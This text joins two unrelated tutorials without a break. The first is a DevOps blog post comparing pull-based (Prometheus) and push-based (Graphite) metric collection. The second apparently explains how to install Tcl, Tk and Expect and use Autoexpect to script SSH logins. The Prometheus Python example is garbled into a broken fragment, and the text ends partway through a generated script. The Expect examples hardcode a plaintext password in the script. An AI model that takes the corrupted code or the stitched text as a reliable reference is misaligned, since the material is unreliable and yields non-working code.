CMD\\r root 1 0 0 09:37 ? 00:00:04 init \\[5\\] \\r root 2 1 0 09:37 ? 00:00:00 \\[migration/0\]\\r root 3 1 0 09:37 ? 00:00:00 \\[ksoftirqd/0\]\\r root 4 1 0 09:37 ? 00:00:00 \\[watchdog/0\]\\r root 5 1 0 09:37 ? 00:00:00 \\[events/0\]\\r ... \\[khess@slartibartfast ~\\]\\$ " send -- "exit\\r" expect -exact "exit\\r logout\\r [H[JConnection to slartibartfast closed.\\r\\r khess@debian5-1:~\\$ " send -- "" expect eof The set timeout -1 disables timeouts for the script. The next line spawns a shell in which to operate, which is an unnecessary step as you can see from your manually created script. The match_max 100000 line raises the buffer to 100000 bytes from the default 2000. The expect -exact “khess@debian5-1:~\$ “ prompt is another unnecessary bit a la Autoexpect. The first line that corresponds to your manually created one is send — “ssh slartibartfast\r”. You should delete all lines that include expect -exact from your script as well as any echoed responses such as command results like those shown from the ps command. Shown below is the final “cleaned” script. #!/usr/local/bin/expect -f set timeout -1 match_max 100000 spawn -- "ssh slartibartfast\\r" expect "password: " send -- "beeblebrox\\r" expect "$ " send -- "ps -ef\\r" send -- "exit\\r" expect eof As you can see, this Autoexpect script looks very similar to your manually created one after cleanup. There are cases where you would want to keep the -exact response but if that response has anything to do with time, command output or anything that changes, you probably don’t want to use it. The Unexpected You’ll have to experiment with your scripts and adjust the timeout values, buffer sizes and prompts to ensure that you receive the desired results from them. Like any script, you’ll spend a little time debugging it. The Autoexpect man page has a few helpful items in it but for real help, look to the Expect man page. Remember that you’re really using Expect behind the scenes. Autoexpect is a script that assists you in making your Expect scripts a little less manual to create but don’t expect too much from it. Now, you can tell your boss that your’re expecting. In fact, tell him that you’re autoexpecting–all in the name of automation and to save those labor pains. Next month, you can expect summer to really heat up with more system administration tips on redirected output and a little Bash magic from the trenches. See you there. Hi Kenneth, What about expecting different command prompts (ending in $, ], >, etc)? is there a way to do it with Autoexpect or does it have to be modified manually? Cheers Very neat blog article.Thanks Again. I was suggested this blog by my cousin. I am not sure whether this post is written by him as nobody else know such detailed about my trouble. You’re incredible! Thanks! Wow! I cant think I have found your blog. Very helpful information. Y2ZKlo Nice blog here! Also your web site loads up fast! Thanks for the article post. Really Great. puIZbI cxwukemfarjo, [url=]ifwqmwpjocyb[/url], [link=]vmlzjogeferp[/link], “Really informative blog.Much thanks again. Fantastic.” Ahaa, its good conversation about this post at this place at this webpage, I have read all that, so now me also commenting here. I’m not sure exactly why but this weblog is loading very slow for me. Is anyone else having this issue or is it a problem on my end? I’ll check back later and see if the problem still exists. Feel free to visit my blog – PatRBackus Check beneath, are some absolutely unrelated web-sites to ours, however, they’re most trustworthy sources that we use. I’m really enjoying the theme/style of your site. Have you ever come upon any browser compatibility problems? A few my blog audience have complained about my blog not working correctly in Explorer but looks great in Firefox. Do you have any tips to aid fix this issue?
http://www.linux-mag.com/id/7828/comment-page-1/
CC-MAIN-2018-43
refinedweb
1,519
65.42
can you use cin and cout with the winapi ? such as drawtext() and the other functions ? of so how ? i was thinking something like that.something like that.Code:cout<<drawtext()<<endl also little trouble figureing out exactly what is going on with this ':' in the inline function so bar(i) is in the scope of mytype2 or just share the variable i ? same i or different i ? passed by ? reference or address ?so bar(i) is in the scope of mytype2 or just share the variable i ? same i or different i ? passed by ? reference or address ?Code:public: Rectangle(int w = 0, int h = 0) : wide(w), high(h) {} and MyType::MyType(int i) : Bar(i) { // ... MyType2::MyType2(int i) : Bar(i), m(i+1) { // ... inline inside class rectangle with var wide and high ? yes ? !giffcopy==idea.bad ? You realize why you can not do this ? because it would be considered regiffing. meow.because it would be considered regiffing. meow.Code:/* regiff.cpp */ #include <string> #include <fstream> using namespace std; int main() { ifstream in("File.gif"); // Open for reading ofstream out("File2.gif"); // Open for writing string s; while(getline(in, s)) // Discards newline char out << s << "\n"; // ... must add it back }
http://cboard.cprogramming.com/cplusplus-programming/122848-cin-cout-winapi.html
CC-MAIN-2015-48
refinedweb
204
71.51
fabricate 1.29.0 The better build tool. Finds dependencies automatically for any language. fabricate is a build tool that finds dependencies automatically for any language. It’s small and just works. No hidden stuff behind your back. It was inspired by Bill McCloskey’s make replacement, memoize, but fabricate works on Windows as well as Linux. Get fabricate.py now, learn how it works, see how to get in-Python help, or discuss it on the mailing list. Features - Never have to list dependencies. - Never have to specify cleanup rules. - The tool is a single Python file. - It uses MD5 (not timestamps) to check inputs and outputs. - You can learn it all in about 10 minutes. - You can still read your build scripts 3 months later. - Now supports parallel building Show me an example! from fabricate import * sources = ['program', 'util'] def build(): compile() link() def compile(): for source in sources: run('gcc', '-c', source+'.c') def link(): objects = [s+'.o' for s in sources] run('gcc', '-o', 'program', objects) def clean(): autoclean() main() This isn’t the simplest build script you can make with fabricate (see other examples), but it’s surprisingly close to some of the more complex scripts we use in real life. Things to note: - It’s an ordinary Python file. Use the clarity and power of Python. - No implicit stuff like CCFLAGS. - Explicit is better: you tell fabricate what commands to run, and it runs them – but only if their inputs or outputs have changed. - Where you’d use targets in make, you just use Python functions – build() is the default. - You can easily “autoclean” any build outputs – fabricate finds build outputs automatically, just like it finds dependencies. Using fabricate options The best way to get started is to take one of the examples linked above and modify it to suit your project. But you’re bound to want to use some of the options built into fabricate. To get a list of these: from fabricate import * help(main) help(Builder) Using fabricate as a script, a la memoize You can also use fabricate.py as a script and enter commands directly on the command line (see command line options). In the following, each gcc command will only be run if its dependencies have changed: fabricate.py gcc -c program.c fabricate.py gcc -c util.c fabricate.py gcc -o program program.o util.o Why not use make? For a start, fabricate won’t say “*** missing separator” if you use spaces instead of tabs. And you’ll never need to enter dependencies manually, like this: files.o : files.c defs.h buffer.h command.h cc -c files.c Instead, you just tell fabricate to run('cc', 'file.c') and it’ll figure out what that command’s inputs and outputs are. Next time you build, the command will only get run if its inputs have changed, or if its outputs have been modified or aren’t there. And you can use Python’s readable string functions instead of producing write-only make rules, like this one from the make docs: %.d : %.c @set -e; rm -f $@; $(CC) -M $(CPPFLAGS) $< > $@.$$$$; \ sed 's,\($*\)\.o[ :]*,\1.o $@ : ,g' < $@.$$$$ > $@; rm -f $@.$$$$ What about SCons? SCons tempted us at first too. It’s Python … isn’t it? But just before it sucks you in, you realise it’s actually quite hard to do simple things explicitly. Python says that explicit is better than implicit for a reason, and with fabricate, we’ve made it so you tell it what you want. It won’t do things behind your back based on the 83 different tools it may or may not know about. Credits fabricate is inspired by Bill McCloskey’s memoize, but fabricate works under Windows as well by using file access times instead of strace if strace is not available on your file system. Read more about how fabricate works. fabricate was originally developed by the B Hoyts at Brush Technology for in-house use, and we then released into the wild. It now has a small but dedicated user base and is actively being maintained and improved by Simon Alford, with help from other fabricate users. License Like memoize, fabricate is released under a New BSD license. fabricate is Copyright (c) 2009 Brush Technology. - Author: Chris Coetzee - Keywords: fabricate make python build - License: New BSD License - Platform: Operating System :: Microsoft :: Windows - Categories - License :: OSI Approved :: BSD License - Programming Language :: Python - Programming Language :: Python :: 2.6 - Programming Language :: Python :: 2.7 - Programming Language :: Python :: 3.2 - Programming Language :: Python :: 3.3 - Programming Language :: Python :: 3.4 - Programming Language :: Python :: 3.5 - Programming Language :: Python :: 3.6 - Topic :: Software Development :: Build Tools - Package Index Owner: chriscz, jjaques - DOAP record: fabricate-1.29.0.xml
https://pypi.python.org/pypi/fabricate
CC-MAIN-2018-13
refinedweb
797
67.45
There are many ways to approach object instantiation. In this article we'll cover a few of the patterns used to instantiate objects. Part I. Standard "New-Uping" The first way we learned to approach object instantiation was with the constructor method on the class. This is the tried and true (and only) way to actually make an instance of a class. The constructor is a method with no return type declared and has the same name as the class it is declared in. Right about now you're probably already thinking "Hey wait a minute! What about the many approaches you mentioned?!?" Well, all the different approaches are really just different ways to control where (and when) we new-up our objects and I'll get to these cool tricks in Part II after we cover the basics. The Default Constructor So, to get started, when we declare a constructor as follows: public class One:Number{ public One() { }} We new-up (instantiate) the object using the constructor we defined: One objOne = new One(); Every time we make a new instance of the "One" class, the constructor method will be run. If there is actually code in the constructor, it will be executed on instantiation of the object. When the following class is instantiated: public class Number{ protected Number() { Console.WriteLine(GetType().ToString() + " built"); }} We'll get a call to the constructor and output to the console. With C#, if no constructor is defined, we get a default constructor by default. This default constructor will have no parameters and will not do anything and essentially be the same as if we had declared an empty constructor so these two class declarations are equivalent. No constructor defined (ends up the same as below): public class One:Number{} Default constructor defined (ends up the same as above): Changing the Default Constructor Also with C#, as soon as we declare a constructor with a signature different than the default constructor, we no longer get a default constructor like in the following two examples: Input parameter change: The default constructor has no parameters, so as soon as we declare an input parameter requirement on the constructor we loose the default constructor: public class One : Number{ public One(int x) { }} In this case we are now required to pass an integer on instantiation: One objOne = new One(3); Accessor change: the default constructor is public, so as soon as we declare that the constructor is private to the "One" class, we can no longer instantiate the object from outside the class. This probably seems strange right now, but we'll discuss how to use this in a bit. public class One : Number{ private One() { }} Providing Multiple Constructors We can provide multiple constructors, so if we want to have the choice of whether to supply a value to the constructor or not we'll just write two of them: public class One : Number{ private One() { } private One(int x) { }} This will allow us to instantiate by passing nothing or passing an integer when we new-up the "One" class so the following two declarations are now valid: One objOne = new One(3);One objOne = new One(); Using Constructors By now you're probably asking "Ok... Real nice constructors -n- all. I get it. But what's the point, really?" The point of constructors is to provide any initialization that the class needs. Let's say we have a property that tells us when the object was instantiated as in the following class. public class Startup{ private DateTime m_startDate; public DateTime StartDate { get { return m_startDate; } }} Ok, that's all fine and good until we need to initialize the value to the time the object was actually instantiated. To do this, we use the constructor: public class Startup{ public Startup() { m_startDate = DateTime.Now; } private DateTime m_startDate; Now we have a class that where the value will be guaranteed to be initialized.; Constructors Calling Constructors If we use the previous example but want to be able to specify the start date, we can overload the constructor: public Startup(DateTime startDate) { m_startDate = startDate; } So now we can choose whether or not to specify the start date. If we don't specify it in the constructor, we get the default which is DateTime.Now. This works fine, but just to follow best practices and to keep our sanity when it comes to maintaining our code, we should specify one (and only one) constructor to be the "master" constructor where everything happens so if there are changes in one of the constructors we don't have to hunt down what is happening where. The "master" constructor will be the one that sets all the member variables in the class: public class Startup{ // Master constructor: // It sets all the values in the class public Startup(DateTime startDate) { m_startDate = startDate; } Now what we want to do is have all the other constructors call the "master" constructor. The syntax for chaining our constructors is as follows: public Startup() : this(DateTime.Now) { } So now, our default construtor will call our "master" constructor and pass the current date and time. If we choose to change the default time in the default constructor we'll just update the value passed from the default constructor to the "master" constructor. This may not seem like a big deal now, but if we have dozens of constructors on an object, it is a good way to organize them so we get consistent behavior and don't repeat code somewhere that we could miss updating. public Startup() : this(DateTime.MinValue) { } Calling Constructors through the Inheritance Chain The final thing we'll look at is calling constructor methods through the inheritance chain. If we have a base class with a parameterized constructor public abstract class Animal{ public Animal(string name) { m_name = name; } private string m_name; public string Name { get { return m_name; } set { m_name = value; } }} We can call the constructor through a derived class by using the base keyword. So in the following class the constructor's parameters are passed to the base constructor. public class Cat : Animal{ public Cat(string name) : base(name) { }} Well, that's pretty much it for the constructor and the main way to "new-up" objects. In the next article we'll look at different patterns for controlling the instantiation of our classes. Until next time,Happy coding
http://www.c-sharpcorner.com/UploadFile/rmcochran/instantiationI06232007000158AM/instantiationI.aspx
crawl-002
refinedweb
1,059
54.15
I've been testing out boost::python for wrapping some C++ code that I've written, but I had some weird results trying to get the "__str__" functionality to work correctly. I have a base C++ class that has a virtual function in it (with a default value). I derive another C++ class from it and change the virtual function. I also create a std::ostream << operator so that I can print this class. Here is the code: struct Base { virtual ~Base() {} virtual int f() const { return 12345; } }; struct Derived : Base { virtual int f() const { return 54321; } }; inline int call_f(Base& b) { return b.f(); } inline std::ostream& operator<<(std::ostream& os, const Base& b) { return os << "A: " << b.f() << std::endl; } ///// Begin Python Wrapper #include <boost/python.hpp> using namespace boost::python; struct BaseWrap : Base { BaseWrap(PyObject* self_) : self(self_) { } BaseWrap(PyObject* self_, const Base& b) : self(self_) , Base(b) { } int f() const { return call_method<int>(self, "f"); } int default_f() const { return Base::f(); } PyObject *self; }; BOOST_PYTHON_MODULE(test2) { class_<Base, BaseWrap>("Base") .def("f", Base::f, BaseWrap::default_f) .def(self_ns::str(self)) ; class_<Derived, bases<Base> >("Derived") // Without this, it doesn't work .def(self_ns::str(self)) ; def("call_f", call_f); } ///// End Python Wrapper First, the Tutorial doesn't include the need for BaseWrap to have both constructors, but it wouldn't compile without both of them (I am using boost-1.31.0 with MSVC 2003 and python 2.3, though I am trying to get it all to work with GCC 3.2.2) First, I can test that without the python wrapper, in a simple C++ script I can do std::cout << Base() << std::endl; and std::cout << Derived() << std::endl; and I get the correct output. So I know that in C++ the << operator is calling the appropriate overloaded function. However, when I load this library in python, if I don't define .def(self_ns::str(self)) for the Derived class, it prints out the exact string for the Base(). Here is the exact python code that I type >>> import test2 >>> import test2 >>> b = test2.Base() >>> b.f() 12345 >>> test2.call_f(b) 12345 >>> print b A: 12345 >>> d = test2.Derived() >>> d.f() 54321 >>> test2.call_f(d) 54321 >>> print d A: 12345 With __str__ redefined for the Derived class I get >>> print d A: 54321 Which is what I want. What is really weird is that call_f() works correctly in python, even if I derive a class in python. >>> class MyClass(test2.Base): ... def f(self): ... return 9876 ... >>> m = MyClass() >>> m.f() 9876 >>> test2.call_f(m) 9876 >>> print m A: 12345 Does anyone know why the call_f() operator is using the correct overload, but the __str__ operator isn't? Thanks, John =:->
https://mail.python.org/pipermail/cplusplus-sig/2004-February/006474.html
CC-MAIN-2017-17
refinedweb
454
73.37
Create a Login Page Let’s create a page where the users of our app can login with their credentials. When we created our User Pool we asked it to allow a user to sign in and sign up with their email as their username. We’ll be touching on this further when we create the signup form. So let’s start by creating the basic form that’ll take the user’s email (as their username) and password. Add the Container Create a new file src/containers/Login.js and add the following. import React, { Component } from "react"; import { Button, FormGroup, FormControl, ControlLabel } from "react-bootstrap"; import "./Login.css"; export default class Login extends Component { constructor(props) { super(props); this.state = { email: "", password: "" }; } validateForm() { return this.state.email.length > 0 && this.state.password.length > 0; } handleChange = event => { this.setState({ [event.target.id]: event.target.value }); } handleSubmit = event => { event.preventDefault(); } render() { return ( <div className="Login"> <form onSubmit={this.handleSubmit}> <FormGroup controlId="email" bsSize="large"> <ControlLabel>Email</ControlLabel> <FormControl autoFocus <ControlLabel>Password</ControlLabel> <FormControl value={this.state.password} onChange={this.handleChange} </FormGroup> <Button block Login </Button> </form> </div> ); } } We are introducing a couple of new concepts in this. In the constructor of our component we create a state object. This will be where we’ll store what the user enters in the form. We then connect the state to our two fields in the form by setting this.state.emailand this.state.passwordas the valuein our input fields. This means that when the state changes, React will re-render these components with the updated value. But to update the state when the user types something into these fields, we’ll call a handle function named handleChange. This function grabs the id(set as controlIdfor the <FormGroup>) of the field being changed and updates its state with the value the user is typing in. Also, to have access to the thiskeyword inside handleChangewe store the reference to an anonymous function like so: handleChange = (event) => { }. We are setting the autoFocusflag for our email field, so that when our form loads, it sets focus to this field. We also link up our submit button with our state by using a validate function called validateForm. This simply checks if our fields are non-empty, but can easily do something more complicated. Finally, we trigger our callback handleSubmitwhen the form is submitted. For now we are simply suppressing the browsers default behavior on submit but we’ll do more here later. Let’s add a couple of styles to this in the file src/containers/Login.css. @media all and (min-width: 480px) { .Login { padding: 60px 0; } .Login form { margin: 0 auto; max-width: 320px; } } These styles roughly target any non-mobile screen sizes. Add the Route Now we link this container up with the rest of our app by adding the following line to src/Routes.js below our home <Route>. <Route path="/login" exact component={Login} /> And include our component in the header. import Login from "./containers/Login"; Now if we switch to our browser and navigate to the login page we should see our newly created form. Next, let’s connect our login form to our AWS Cognito set up. If you liked this post, please subscribe to our newsletter, give us a star on GitHub, and check out our sponsors. For help and discussionComments on this chapter
https://branchv21--serverless-stack.netlify.app/chapters/create-a-login-page.html
CC-MAIN-2022-33
refinedweb
565
58.69
The source code for this document uses polyglot markup, polyglot markup. The following shapes use SVG elements. Polyglot markup introduces undeclared (native) default namespaces for the the root SVG element ( svg) and respects the mixed-case element names and values when appropriate, as described in the section on Element-Level Namespaces, the section on Element Names and the section on Attribute Values. There is an empty p element before this paragraph. Polyglot markup uses <p></p> and not <p/>. Polyglot markup treats certain elements as self-closing, void elements, such as the following img element. For more information, see the Void Elements section. The following table uses the required tbody element, as described in the Required elements and tags section. The following table makes use of the col element and therefore uses the then required colgroup element as col element wrapper for, as described in the Required elements and tags section. The paragraph you now read, uses the string & for ampersands (“&”) and uses, as described in the section on Named entity references, the string   for a non-breaking space between the following two words: “polyglot markup”.
http://www.w3.org/TR/html-polyglot/SamplePage.html
CC-MAIN-2015-18
refinedweb
186
53.1
I created a function in my program that would take info about a teacher and their class room and then write it to a file. Then I added a loop so that people could keep adding more teachers. Then I thought I would be good to make a break statement so people can easily close the program. The problem is, is that after you cycle through this once it starts looping and never stops for user input. Here's the code- Code:#include <iostream> #include <fstream> using namespace std; int teacher_info(char name[10], char subject[10], int room_num) { ofstream fout("school.txt"); fout << name << ":\n\tSubject: " << subject << "\n\tRoom number: " << room_num << endl; fout.close(); return 0; } int main() { char name[10], subject[10]; int room_num; cout << "\nNOTE: to exit type 'exit' as the teacher name." << endl; while (true) { cout << "\nName: "; cin >> name; if (name == "exit") break; cout << "\nSubject: "; cin >> subject; cout << "\nRoom number: "; cin >> room_num; teacher_info(name, subject, room_num); } return 0; }
https://cboard.cprogramming.com/cplusplus-programming/31971-infinate-loop.html
CC-MAIN-2017-22
refinedweb
162
77.98
1.4 Beta The 1.4 version of the MySenors Arduino library is new open for beta testing. Arduino library and examples Vera plugin (1.4) Here are some of the hi-lights. -. All examples in the development branch above has been converted to use the new functionality of the library. The new API: /** * Constructor * * Creates a new instance of Sensor class. * * @param _cepin The pin attached to RF24 Chip Enable on the RF module (defualt 9) * @param _cspin The pin attached to RF24 Chip Select (default 10) */ MySensor(uint8_t _cepin=9, uint8_t _cspin=10); /** * Begin operation of the MySensors library * * Call this in setup(), before calling any other sensor net library methods. * @param incomingMessageCallback Callback function for incoming messages from other nodes or controller and request responses. Default is NULL. * @param nodeId The unique id (1-254) for this sensor. Default is AUTO(255) which means sensor tries to fetch an id from controller. * @param repeaterMode Activate repeater mode. This node will forward messages to other nodes in the radio network. Make sure to call process() regularly. Default in false * @param parentNodeId Use this to force node to always communicate with a certain parent node. Default is AUTO which means node automatically tries to find a parent. * @param paLevel Radio PA Level for this sensor. Default RF24_PA_MAX * @param channel Radio channel. Default is channel 76 * @param dataRate Radio transmission speed. Default RF24_1MBPS */); /** * Return the nodes nodeId. */ uint8_t getNodeId(); /** * Each node must present all attached sensors before any values can be handled correctly by the controller. * It is usually good to present all attached sensors after power-up in setup(). * * @param sensorId Select a unique sensor id for this sensor. Choose a number between 0-254. * @param sensorType The sensor type. See sensor typedef in MyMessage.h. * @param ack Set this to true if you want destination node to send ack back to this node. Default is not to request any ack. */ void present(uint8_t sensorId, uint8_t sensorType, bool ack=false); /** * Sends sketch meta information to the gateway. Not mandatory but a nice thing to do. * @param name String containing a short Sketch name or NULL if not applicable * @param version String containing a short Sketch version or NULL if not applicable * @param ack Set this to true if you want destination node to send ack back to this node. Default is not to request any ack. * */ void sendSketchInfo(const char *name, const char *version, bool ack=false); /** * Sends a message to gateway or one of the other nodes in the radio network * * @param msg Message to send * @param ack Set this to true if you want destination node to send ack back to this node. Default is not to request any ack. * @return true Returns true if message reached the first stop on its way to destination. */ bool send(MyMessage &msg, bool ack=false); /** * Send this nodes battery level to gateway. * @param level Level between 0-100(%) * @param ack Set this to true if you want destination node to send ack back to this node. Default is not to request any ack. * */ void sendBatteryLevel(uint8_t level, bool ack=false); /** * Requests a value from gateway or some other sensor in the radio network. * Make sure to add callback-method in begin-method to handle request responses. * * @param childSensorId The unique child id for the different sensors connected to this Arduino. 0-254. * @param variableType The variableType to fetch * @param destination The nodeId of other node in radio network. Default is gateway */ void request(uint8_t childSensorId, uint8_t variableType, uint8_t destination=GATEWAY_ADDRESS); /** * Requests time from controller. Answer will be delivered to callback. * * @param callback for time request. Incoming argument is seconds since 1970. */ void requestTime(void (* timeCallback)(unsigned long)); /** * Processes incoming messages to this node. If this is a relaying node it will * Returns true if there is a message addressed for this node just was received. * Use callback to handle incoming messages. */ boolean process(); /** * Returns the most recent node configuration received from controller */ ControllerConfig getConfig(); /** * Save a state (in local EEPROM). Good for actuators to "remember" state between * power cycles. * * You have 256 bytes to play with. Note that there is a limitation on the number * of writes the EEPROM can handle (~100 000 cycles). * * @param pos The position to store value in (0-255) * @param Value to store in position */ void saveState(uint8_t pos, uint8_t value); /** * Load a state (from local EEPROM). * * @param pos The position to fetch value from (0-255) * @return Value to store in position */ uint8_t loadState(uint8_t pos); /** * Returns the last received message */ MyMessage& getLastMessage(void); /** * Sleep (PowerDownMode) the Arduino and radio. Wake up on timer. * @param ms Number of milliseconds to sleep. */ void sleep(int ms); /** * Sleep (PowerDownMode) the Arduino and radio. Wake up on timer or pin change. * See: for details on modes and which pin * is assigned to what interrupt. On Nano/Pro Mini: 0=Pin2, 1=Pin3 * @param interrupt Interrupt that should trigger the wakeup * @param mode RISING, FALLING, CHANGE * @param ms Number of milliseconds to sleep or 0 to sleep forever * @return true if wake up was triggered by pin change and false means timer woke it up. */ bool sleep(int interrupt, int mode, int ms=0); /** * getInternalTemp * * Read temp from internal (ATMEGA328 only) temperature sensor. This reading is very * inaccurate so we round the result to full degrees celsius. * * * @return Temperature in full degrees Celsius. */ int getInternalTemp(void); ###To convert an old 1.3 sketch follow this guide: Include section Remove the following includes #include <Sleep_n0m1.h> #include <EEPROM.h> #include <RF24.h> #include <Sensor.h> #include <Relay.h> Add #include <MySensor.h> Global variable scope Change the following lines Sensor gw; or Relay gw; To MySensor gw; Also message containers for outgoing messages. E.g. Light level message for child sensor id 1. MyMessage msg(1, V_LIGHT_LEVEL); ####Setup() In setup() replace sendPresentation with present. Also note that begin() now allows you to add an function-argument to get callbacks for incoming messages (actuators). begin also controls wether this node should act as an repeater node. See above for full argument list. ####Loop() The sending of values looks a bit different. The old sketches could look like this: gw.sendVariable(CHILD_ID_LIGHT, V_LIGHT_LEVEL, lux); In new code you send a value by using the MyMessage contaner defined in global scope. Fill it with the value to send like this (where lux is light level in this case). gw.send(msg.set(lux)); Replace any sleeping with the new build in sleep functions. The old code might have a few lines like this: delay(500); gw.powerDown(); sleep.pwrDownMode(); //set sleep mode sleep.sleepDelay(SLEEP_TIME * 1000); Replace those with: gw.sleep(<sleep time in milliseconds>); @Hek Ok, so last time i was writing about my problem with latest version of this beta, and Relays not working. When i am sending message, example 11;1;1;2;1 with, or wothout newline char nothing happen. Even stranger is that serial gateway giving me message with 4 segments, istead of normal 5. Look at the screenshoot: . This is Relay + button, but same thing is with Relay alone. While server was down, I've used a recent tab from this post. This file represent the mhl backup Due to server upload limits, removed one photo and zipped the mhl file. It is like it never happened. Arduino Library 1_4b1_ Call for beta testers_ MySensors Forum.zip This post is deleted! Hello I'm using serialgateway and trying to interface with a linux machine. I setup serial with a simple stty -F /dev/ttyUSB0 cs8 115200 -onlcr -icrnl cat /dev/ttyUSB0 works fine; 0;0;3;9;Arduino startup complete. 0;0;3;9;read: 255-255-0 s=255,c=3,t=3,pt=0,l=0,cr=ok: 255;255;3;3; but I am unable to send data from the gateway echo -n -e "255;255;3;4;1\n" > /dev/ttyUSB0 Nothing happens, not even in perl I can get it to work. $port->write("255;255;3;4;1\n"); what am I doing wrong? Thanks, that worked. I thought I understood the message layout.. never seen that 0 before:) It's a change in the serial protocol for 1.4. 1 = request ack back from destination node. 0 = no ack. It's a change in the serial protocol for 1.4. Could you describe it better keeping in mind my problem with Relay? How the message should look like to turn on Relay? Previously message like this worked ok - 11;1;1;2;1. @jendrush I suppose it should be 11:1:1:0:2:1 then @hek what about C_STREAM ? Didnt find much about it. I just tried to send myself a picture over the network. real ugly code but it worked.. thought if I put a small cam and someone rings on the doorbell or something.. (Right now I just read the data from SPI flash) This post is deleted! I've tried the lib for a while now and found the following: Then using ack=1 the returned message is exacly the one I sent. No way of knowing if its a request or an ACK. example: Client sends 3;255;3;6;0 (Give me configuration 0 (btw, why not leave config as a byte 0-255 instead of hardcoing it? I could have plenty of uses for configuration-values.) Gateway responds: 3;255;3;6;M and requests ack client sends 3;255;3;6;M my software tried to lookup config id 'M' (Not a big deal for letter, but what if its a number?) maybe ACK should be some sort of incremental number in return in special message type. I dont really know what is best. It would be great if GW resends the messsage automatically a couple of times (configurable) if ACK = 1. I've also noticed during DEBUG enabled that the message gets overwritten by old one, i.e. send: 3-3-0-0 s=255,c=0,t=18,pt=0,l=15,st=fail:1.4b1 (18848a2) send: 3-3-0-0 s=255,c=3,t=11,pt=0,l=4,st=ok:test1 (18848a2) send: 3-3-0-0 s=255,c=3,t=12,pt=0,l=3,st=ok:2.0t1 (18848a2) (message 2: test1, message 3: 2.0) Edit; One more thing Do I really need one gw.process(); before each gw.send(..); in the loop? I seam to loose messages if I dont do like that. void loop() { delay(dht.getMinimumSamplingPeriod()); gw.process(); float temperature = dht.getTemperature(); gw.send(msgTemp.set(temperature, 1)); gw.process(); float humidity = dht.getHumidity(); gw.send(msgHum.set(humidity, 1)); // gw.sleep(SLEEP_TIME); //Seems to break recieing message, loosing ~75% } @Damme Other wireless protocols usually have a counter which is increased with each message. Returning the counter as an ack would be sufficient to correlate the ack and the original message. Returning the whole message seems like overkill indeed... The send-methods could e.g. return the Id counter of the message sent, and an app waiting for an ack on that message should check for this value in any ack received (using some timeout) Additional comment on config; I think it should be request config, response config messages. I also think its a bit odd that the actuator reports as gw.present(2, S_LIGHT); but requests as if (message.type==V_LIGHT) { V_LIGHT != S_LIGHT (2 vs 3) I think the def should follow as much as possible. hope any of my thoughts are somewhat useful @Damme there's a lot of Vera legacy in there... This forum had a discussion going on about decoupling from Vera, but I'm afraid that got lost in the crash... // gw.sleep(SLEEP_TIME); //Seems to break recieing message, loosing ~75% me just dumb here, delay(SLEEP_TIME); works. gw.sleep puts radio in sleep I guess. me just dumb here, delay(SLEEP_TIME); works. gw.sleep puts radio in sleep I guess. gw.sleep() puts both Arduino and radio to sleep. The send-methods could e.g. return the Id counter of the message sent, and an app waiting for an ack on that message should check for this value in any ack received (using some timeout) That mean you might have to rememeber the original message. The idea is to have all the information necessary in the callback. In my example sketches (e.g. RelayActuator) the ack message actually changes the relay status when the ack comes back from gateway. If not full message came in you would have to keep buffers with sent messages and start matching counter-values. Much more complicated. But a message counter will probably be necessary if/when we start encrypting messages to prohibit replay attacks. @Damme I actually thought about having a bit in the message header which says if the message is an ack or not. With that implemented you would just call a msg.isAck() to determine if the incoming message is an ack message. Would that be ok? You shouldn't need to call gw.process() after each send. It is only necessary in the loop() section if you expect incoming messages or have enabled repeater mode. I don't understand what you mean with messages getting overwritten with DEBUG enabled. Could you explain it a bit more (with an example?)..
https://forum.mysensors.org/topic/168/1-4-beta/23
CC-MAIN-2019-13
refinedweb
2,227
67.76
All of the components on the board are 'hitable' board. If you have got an Astro Pi board and haven't yet set it up take a look at my Astro Pi - Getting Started Tutorial. Once your Astro Pi is up and running you can download the code from github.com/martinohanlon/MinecraftInteractiveAstroPi and run it by opening a terminal and using the following commands: cd ~ git clone cd MinecraftInteractiveAstroPi sudo python mcinteractiveastropi.pyThe Minecraft Astro Pi board will appear above the player, so fly up (double tap space) and have a look around. You interact with it by hitting it (right clicking) with a sword. Someone let me know that they got an error while trying to use the program with Python 2 because AstroPi needs a module called PIL which wasn't installed. I didn't get this error but if you received the error "No module named PIL", run the following command to install it: sudo pip install Pillow Hi I'm having no luck with this. I get this error message:- Traceback (most recent call last): File "mcinteractiveastropi.py", line 16, in from astro_pi import AstroPi ImportError: No module named astro_pi The Astro Pi is connected because I checked with another program. Hope you can help. Its a simple problem. When I wrote this, I was using a Beta version of the Sense HAT software and at the time it was called "astro_pi".. Change: from astro_pi import AstroPi to: from sense_hat import AstroPi I'll also update the repository, so you could delete it and re download it. Thank you Martin it's all working well now. Looking forward to showing this to my Minecraft mad grandson. No problem, thanks for letting me know.
http://www.stuffaboutcode.com/2015/05/interactive-minecraft-astro-pi.html
CC-MAIN-2017-17
refinedweb
288
71.85
20 April 2009 17:46 [Source: ICIS news] LONDON (ICIS News)--INEOS ChlorVinyls has shut the methylene chloride, chloroform and methyl chloride units at ?xml:namespace> The shutdown, which took place over 18-19 April, is expected to halt production of the chemicals for at least a week, the source said. The shutdown came as some methylene chloride producers were trying to increase prices in an effort to recover revenue lost by falling caustic soda prices. Another methylene chloride producer said the INEOS closure would help it to push through a price increase in May. The shutdown is unlikely to have a large effect the chloroform market, as INEOS uses most of its chloroform captively for the production of the refrigerant R22. The chloroform market has been has been hit by weak demand for refrigerants from the automotive and construction sectors. For more on methylene chloride and chloroform.
http://www.icis.com/Articles/2009/04/20/9209459/ineos-chlorvinyls-halts-production-at-runcorn-plant.html
CC-MAIN-2013-20
refinedweb
148
59.03
